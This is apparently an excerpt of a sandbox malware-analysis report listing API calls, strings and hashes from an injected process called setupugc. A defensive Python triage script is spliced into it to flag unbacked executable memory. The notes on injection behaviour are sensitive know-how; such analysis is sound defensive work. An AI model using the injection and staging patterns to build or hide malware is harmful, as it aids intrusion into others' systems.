                • Opcode Fuzzy Hash: 155abccc208a26b06edeadb5fcc03e029c8794978c5d0c17ca798ee7bc69e911
                • Instruction Fuzzy Hash: 05018471D0020C7ADB11ABE58C81EFFBB7CDF41794F048065FA18A7241D6745E068BB1

                Control-flow Graph (graph rendering not reproduced)
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 00CF0D57
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction ID: 7cd547fb1c5bc77b2158b5694fa4a32448cc8f0b4a75ec5742445e19859099a6
                • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction Fuzzy Hash: 72D0A722A4510C65835351E96C419BDBB7CE982A51B1001B7EE04C0012F505451A1AE3
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: f259ab0ec36756b1f4674d311f2109ed7917bc5333d36eb1466bf8f58afe42e8
                • Instruction ID: 965c2933d2c2100678e8719a3f34cfce44391d230edef449140aa7d518b865b1
                • Opcode Fuzzy Hash: f259ab0ec36756b1f4674d311f2109ed7917bc5333d36eb1466bf8f58afe42e8
                • Instruction Fuzzy Hash: 3A318DB1600605BBD714DFA4C881FEBB7BCEB88714F144519B65DAB281D770AA40CBB4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: InitializeUninitialize
                • String ID: @J7<
                • API String ID: 3442037557-2016760708
                • Opcode ID: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                • Instruction ID: 51ae88f543af510af335a556019bc4c8294aa762576c80ee4ad5efc787afff19
                • Opcode Fuzzy Hash: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                • Instruction Fuzzy Hash: EE3152B6A0060A9FDB00DFD8DC809EFB7B9FF88304B108559E515EB254D771EE468BA1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: InitializeUninitialize
                • String ID: @J7<
                • API String ID: 3442037557-2016760708
                • Opcode ID: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                • Instruction ID: 8242fefe0d5b5747c2ebfc78776489491ff2c3b82f12f82620426a01abf96039
                • Opcode Fuzzy Hash: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                • Instruction Fuzzy Hash: F33152B6A002099FDB00DFD8D8809EFB7B9FF88304B108559E515EB254D771EE468BA1
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00CF44E2
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction ID: 412be88c11bdb39e5a7a16a4c2fc6d8434231dac2315aa972170b16db4fca1cf
                • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction Fuzzy Hash: 930100B5E0020DA7DB14DBE4DC42F9EB7789B54308F004695AA18A7181F631EB54CB61
                APIs
                • CreateProcessInternalW.KERNEL32(?,?,?,?,00CF826E,00000010,?,?,?,00000044,?,00000010,00CF826E,?,?,?), ref: 00D09723
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                • Instruction ID: e4959a1d2750700a3e3e5e24bba760e65a2881d6178a8b464b6785c20b35e8c7
                • Opcode Fuzzy Hash: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                • Instruction Fuzzy Hash: 580184B2205508BBDB54DF99DC81EEB77ADAF8C754F148208FA19A3241D630F9518BA4
                APIs
                • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00CE9BE5
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                • Instruction ID: 2b084c8b99b7906c1d98ecfba19f380e55bd85b45b0e01b70472cf88024dee58
                • Opcode Fuzzy Hash: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                • Instruction Fuzzy Hash: 5CF0397338020436E22162AAAC02FDBB28CCB80BA1F140025FA1CEA2C1D9A1B94182B5
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00CF44E2
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction ID: fd0f6d10c82fbf4527b1942ae2d1a3189233535e33218c10ad70663dfe12b7a4
                • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction Fuzzy Hash: 55F09071E4010DABDF10DAD4D881FE9B7B4EB54318F0083D5EA1C9B280E5319A188B91
                APIs
                • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00CE9BE5
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                • Instruction ID: 0b98c6bead18fb0986d27995071ee642a5654fc2be3a7731d933736010ae8c0f
                • Opcode Fuzzy Hash: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                • Instruction Fuzzy Hash: 97E0927378024036E23162A59C43FDB665CCF84B50F140055F71CAB1C1D9A1B54183B4
                APIs
                • RtlAllocateHeap.NTDLL(00CF1979,?,00D0571B,00CF1979,00D055AF,00D0571B,?,00CF1979,00D055AF,00001000,?,?,00000000), ref: 00D0961F
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction ID: 3c32e87e57c7868f42c303e460aeea92310c45f79f1c966ac8e828cc92b52067
                • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction Fuzzy Hash: 8DE06D712003047BD610EE59DC45FAB37ACEFC5710F004408FD08A7282D670B91486B5
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00CF3CF2,000000F4), ref: 00D0966C
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction ID: 47598f2c2f9c8f7ed84ce5182b54d30005eb9676fb4d55a6fa1a7216e7a66a78
                • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction Fuzzy Hash: 7BE039B22006047BD610EA59DC45F9B77ACEBC4710F008409F908A7281DA31B9108BB4
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                • Instruction ID: 0c133e3dddb3b0ed265d8907ab092f0dc4b62636c3d36927535bf81981619dab
                • Opcode Fuzzy Hash: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                • Instruction Fuzzy Hash: 6CE0807514070817F72466A8DC45FB5335C9B44724F144550FE2CDB1C5E9B4FA018179
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                • Instruction ID: cbe9758b0ef732d97d549f73fd8f596baa3f9c07c597e2407b52d108a0d6bcfe
                • Opcode Fuzzy Hash: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                • Instruction Fuzzy Hash: 8DE0207944070417E71016A49E477FA3218AF04320F1C0654FD78DB1C7D56CEA468339
                APIs
                • SetErrorMode.KERNEL32(00008003,?,?,00CF1C60,00D07EEF,00D055AF,00CF1C30), ref: 00CF80D3
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                • Instruction ID: 8301b99ca539432d9bb499cbe58c27794c616a9358473f811d6657776ee07549
                • Opcode Fuzzy Hash: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                • Instruction Fuzzy Hash: 4DE0C77A2802002BF311AAA98C03F5A328C8B54360F454428BE0CDB3C2EE60EA0282A1
                APIs
                • SetErrorMode.KERNEL32(00008003,?,?,00CF1C60,00D07EEF,00D055AF,00CF1C30), ref: 00CF80D3
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                • Instruction ID: b9870df808a16e9d9f83fc843cb14396dabce26315447bed32e7bfef3535ec40
                • Opcode Fuzzy Hash: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                • Instruction Fuzzy Hash: 93D05E766803043BF651A7E59C17F5A328C8B54764F054068BE0CD72C2ED64E6018175
                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 00CF82DC
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                • Instruction ID: 3cfe5853b239205787d75d437d804a4bfb3d7dcc1a762f7d4bf6ff192e2d9d89
                • Opcode Fuzzy Hash: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                • Instruction Fuzzy Hash: 70D0973521180804E7201AACB4083FA7344EB073387000900E938CE9D8C623B4CE400A
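The entries above for the region at 00CE0000 in process 17 (setupugc) share one property a reviewer cares about: the sandbox could not tie the memory to any PE image ("based on PE: false"), yet the functions in it call CreateThread, LdrLoadDll, RtlAllocateHeap and SetErrorMode. Reading that by eye across hundreds of entries is slow, so the following script is an added example (not Joe Sandbox tooling and not part of this report) that parses the "APIs" and "Memory Dump Source" lines of this function list and flags regions with that profile. The dump-file name is decoded on the assumption that its first field is the process id (0x11 = 17, which matches the `hcaresult_17_2_…` snapshot names), its fourth field the base address (it matches the printed Offset) and its fifth field the page protection (0x40 = PAGE_EXECUTE_READWRITE); the excerpt it runs on is constructed from three entries copied from the list above.

```python
"""Triage helper for the per-function entries of a Joe Sandbox report.

Added example, not Joe Sandbox tooling. It parses the "APIs" / "Memory Dump
Source" lines of the function list and surfaces functions that live in
memory regions the sandbox could not tie to a PE image ("based on PE: false")
yet call thread-creation or loader APIs, the profile a reviewer checks first
when a report also carries process-injection signatures, as this one does.
"""
import re
from collections import defaultdict

# Constructed excerpt: three entries copied from the function list
# (bullets kept as in the report), enough to exercise the parser.
REPORT_EXCERPT = """\
APIs
• CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00CE9BE5
Memory Dump Source
• Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
Similarity
• API ID: CreateThread
• Instruction Fuzzy Hash: 580184B2205508BBDB54DF99DC81EEB77ADAF8C754F148208FA19A3241D630F9518BA4
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00CF44E2
Memory Dump Source
• Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
Similarity
• API ID: Load
• Instruction Fuzzy Hash: 55F09071E4010DABDF10DAD4D881FE9B7B4EB54318F0083D5EA1C9B280E5319A188B91
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 036ECFBD
Memory Dump Source
• Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
Similarity
• API ID: CallFilterFunc@8
• Instruction Fuzzy Hash: AD4188B99012189FDB21DFA8C940AAEBBB8FF45B00F08442EE915DB264D774C845CB65
"""

# "<name>.<MODULE>(<args>), ref: <addr>"; the LIBCMT form has no argument list.
API_RE = re.compile(r"•\s*(?P<name>[^\s(]+)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]+)")
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-F]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")

# APIs that, called from unbacked executable memory, mark a payload stage.
STAGE_APIS = {"CreateThread", "LdrLoadDll", "RtlAllocateHeap", "SetErrorMode"}
PAGE_EXECUTE_READWRITE = 0x40  # Windows memory-protection constant


def parse_entries(text):
    """Split the report into per-function entries ("Instruction Fuzzy Hash" closes one)."""
    entries, cur = [], {"apis": []}
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.search(line)
        if m:
            cur["apis"].append((m["name"], m["module"], m["ref"]))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.update(dump=m["dump"], offset=m["offset"], pe_backed=(m["pe"] == "true"))
            continue
        if line.startswith("• Instruction Fuzzy Hash:"):
            cur["instr_hash"] = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur = {"apis": []}
    return entries


def dump_fields(dump_name):
    """Decode the dump file name. Field meaning is an ASSUMPTION checked against
    the report: field 0 (0x11 = 17) matches the 'hcaresult_17_2' snapshot name
    and field 3 matches the printed Offset; field 4 is read as page protection."""
    f = dump_name.split(".")
    return {"pid": int(f[0], 16), "run": int(f[1], 16),
            "base": int(f[3], 16), "protect": int(f[4], 16)}


def triage(entries):
    """Group entries by region; flag unbacked RWX regions whose functions call stage APIs."""
    regions = defaultdict(lambda: {"functions": 0, "apis": set(), "pe_backed": True})
    for e in entries:
        r = regions[e["dump"]]
        r["functions"] += 1
        r["pe_backed"] = e["pe_backed"]
        r["apis"].update(name for name, _, _ in e["apis"])
    for dump, r in regions.items():
        r.update(dump_fields(dump))
        r["suspicious"] = (not r["pe_backed"]
                           and r["protect"] == PAGE_EXECUTE_READWRITE
                           and bool(r["apis"] & STAGE_APIS))
    return dict(regions)


if __name__ == "__main__":
    for dump, r in triage(parse_entries(REPORT_EXCERPT)).items():
        print(f"pid {r['pid']} base {r['base']:08X} pe_backed={r['pe_backed']} "
              f"apis={sorted(r['apis'])} suspicious={r['suspicious']}")
```

Run against the full function list, the region at 00CE0000 is the only one that comes out flagged; the ntdll-backed region at 03630000 carries CRT and RTL debug strings and is not. The protection check depends on the field-layout assumption above, so treat a mismatch between the decoded base and the printed Offset as a sign the layout differs and the flag should not be trusted.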
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 88b011a40f7760b64bd403df16285e51dc6ecc40ae4eaa795fc3e4c39ec77b1d
                • Instruction ID: 9f6a6176610fa0dc8021a7162849246be0f09923162e2ca8c1c7fa3bbba52ca3
                • Opcode Fuzzy Hash: 88b011a40f7760b64bd403df16285e51dc6ecc40ae4eaa795fc3e4c39ec77b1d
                • Instruction Fuzzy Hash: D6B09B719419C5C5DA51E7644B08717791467D1701F19C461D2030751F4779C5D1EA75
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378682288.0000000003480000.00000040.00000800.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3480000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                • API String ID: 0-3558027158
                • Opcode ID: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                • Instruction ID: e7d41faa10a3687649a14afd686bfef3959439dc09a4403767a65c3b03e845e9
                • Opcode Fuzzy Hash: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                • Instruction Fuzzy Hash: D89171F04482988AC7158F55A0612AFFFB1EBC6304F15816DE7E6BB243C3BE8945CB85
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378682288.0000000003480000.00000040.00000800.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3480000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                • API String ID: 0-3228068659
                • Opcode ID: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                • Instruction ID: a7cc8c61598c5d38ded4f7dc06fde7618693d54539da21706387e57559828781
                • Opcode Fuzzy Hash: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                • Instruction Fuzzy Hash: 042144B081468C8ADF14DF86D991AEDBF71FB10348F208109D4446F3A4D7781A42CF8A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 3dd17f60b600405780a141e2ce03d762638b2ee35af883a0a85e1d13d91d650e
                • Instruction ID: 5c5ef37b2e2ca5c4c3146be46e3eee1db65c01813297757cac703c8e00e36d2c
                • Opcode Fuzzy Hash: 3dd17f60b600405780a141e2ce03d762638b2ee35af883a0a85e1d13d91d650e
                • Instruction Fuzzy Hash: 8B51E5B6E04616AFCB10DF9DC9A097EFBB8BB08600B148669E465D7741D334DE448FA0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: fc5210c6ee8346e61ca132d1af1c7cc773cb8d82b0152ffee3c4889355cc24a3
                • Instruction ID: cffe9d94e0b7595251b2e82b53140f6dc58f9689acf4f94acb05f34d1981473d
                • Opcode Fuzzy Hash: fc5210c6ee8346e61ca132d1af1c7cc773cb8d82b0152ffee3c4889355cc24a3
                • Instruction Fuzzy Hash: B7512876B00645AECB30DF9CC89097FBBFDEB44200B1488A9E896D7646E774DE50DB60
                Strings
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 036D4787
                • Execute=1, xrefs: 036D4713
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036D4725
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036D46FC
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036D4655
                • ExecuteOptions, xrefs: 036D46A0
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036D4742
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 6041509ca6f647cf3f6c498d193948638925adfa5d976faba183714d78ba4b0b
                • Instruction ID: 4dc5d1e6be5eec0b556aaaa4a2ee96b217a3d691a07d9ccf4e280adbd4d321fb
                • Opcode Fuzzy Hash: 6041509ca6f647cf3f6c498d193948638925adfa5d976faba183714d78ba4b0b
                • Instruction Fuzzy Hash: 51511635A003196AEF11EFA9DD89BAE77ACEF45300F0800EAD505AF281EB719E558F54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: dca71aad2688ae1d8497f282aeba0b8c0e981b2131b7987664e3a2e4191a295c
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: E281CC30E05A499EDF28CE6CCA917FEBBB2AF45320F1C425AD861A7391C7708C518F64
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: aa5249cf52af6a06d33abb5fa061f0d002e12e9877afb7d4bcdea1e24c27ae7b
                • Instruction ID: 9be4c05adad71d62e51d96f51224f6b12f7a5d18ee36cff19a01488a0a447ff3
                • Opcode Fuzzy Hash: aa5249cf52af6a06d33abb5fa061f0d002e12e9877afb7d4bcdea1e24c27ae7b
                • Instruction Fuzzy Hash: DB21517BE00219ABCB50DF6DCC40AEEBBF9EF54640F18052AE905E7201E770DA119BA1
                Strings
                • RTL: Re-Waiting, xrefs: 036D031E
